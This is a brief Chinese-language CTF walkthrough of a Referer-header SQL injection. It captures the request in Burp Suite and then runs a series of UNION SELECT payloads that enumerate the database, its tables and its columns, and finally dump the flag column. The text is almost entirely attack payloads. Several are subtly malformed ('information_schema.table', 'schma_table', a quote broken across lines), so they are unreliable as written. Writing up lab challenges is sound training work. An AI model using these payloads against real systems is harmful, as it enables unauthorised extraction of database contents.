referer注入
根据提示寻找referer,对其进行bp抓包,并发包到repeater
对referer进行注入判断
-1 union select 1,2
在注入后回显并显示内容,判断为referer注入
-1 union select database(),1 查库名
然后查询数据库的表名
-1 union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’
表名分别为 news 和 cdfpqmpjgl
4. 然后查询cdfpqmpjgl的列名
-1 union select 1,group_concat(column_name) from information_schema.columns where schma_table=‘sqli’ and table_name=‘cdfpqmpjgl
’
查询该库该表该列的所有字段
-1 union select 1,group_concat(btbeqjzwag) from sqli.cdfpqmpjgl
得出flag